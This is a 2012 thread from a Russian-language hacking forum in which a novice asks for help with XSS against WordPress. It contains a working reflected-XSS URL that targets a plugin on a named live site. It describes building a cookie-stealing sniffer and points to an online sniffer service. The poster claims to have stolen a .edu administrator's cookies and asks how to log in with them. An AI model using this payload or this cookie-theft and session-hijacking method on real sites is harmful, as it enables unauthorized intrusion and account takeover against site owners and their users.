Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   XSS на вордпрессе проблема. (https://forum.antichat.xyz/showthread.php?t=315664)

Cmexo3aBp 27.01.2012 16:37
Вообщем потихоньку начал вникать в ХСС и столкнулся с такой проблемой.

http://www.gamechangers.com/index.html/wp-content/plugins/simple-flash-video/stats/?action=regenerate&query=&date=201109%22%3E%3CSCRI PT%3Ealert%28/xss/.source%29%3C/SCRIPT%3E

Перейдя по ссылки видим всплывающий алерт с надписью ХСС.

Делаю вывод что ХСС активная уязвимость присутствует.

Далее заливаю к себе на хостинг следующие файлы:

file.js :

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
file.php :

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
И вставляю в уезвимое место следующий код:

В результате в файл куки.тхт ничего не записывается. Права на запись на хостинге поставил ..

Подскажите где ошибка ?

satana-fu 27.01.2012 17:02
file.php

Цитата:
Сообщение от None


NZT 27.01.2012 22:20
Я сам новичок, но xss у меня получилась , просто использовал online xss sniffer этот : http://hacker-pro.net/sniffer/ , и не нужно было создавать свой сайт , и писать снифер , в этом снифере уже все готово и готовые скрипты есть которые надо вставлять. Попробуй может подойдет тебе. Я его использовал для тренировки.

Cmexo3aBp 28.01.2012 09:59
Цитата:
Сообщение от None
cook=__utma=14119845.609346301.1322517201.13262143 52.1326220450.10; __utmz=14119845.1322517201.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); __unam=74abf65-134438036ee-756c813d-2; __utma=180505699.1874526909.1323982403.1323982403. 1324472558.2; __utmz=180505699.1324472558.2.2.utmcsr=google|utmc cn=(organic)|utmcmd=organic|utmctr=(not provided);
Получил успех сегодняшней ночью спёр куки вроде бы как у админа сайта .edu

Вопрос как теперь их заюзать чтоб зайти под ним ?

kravch_v 28.01.2012 18:22
Цитата:
Сообщение от Cmexo3aBp
Cmexo3aBp said:
Получил успех сегодняшней ночью спёр куки вроде бы как у админа сайта .edu
Вопрос как теперь их заюзать чтоб зайти под ним ?
никак. не вижу здесь сессии.

хотя все возможно


Время: 21:50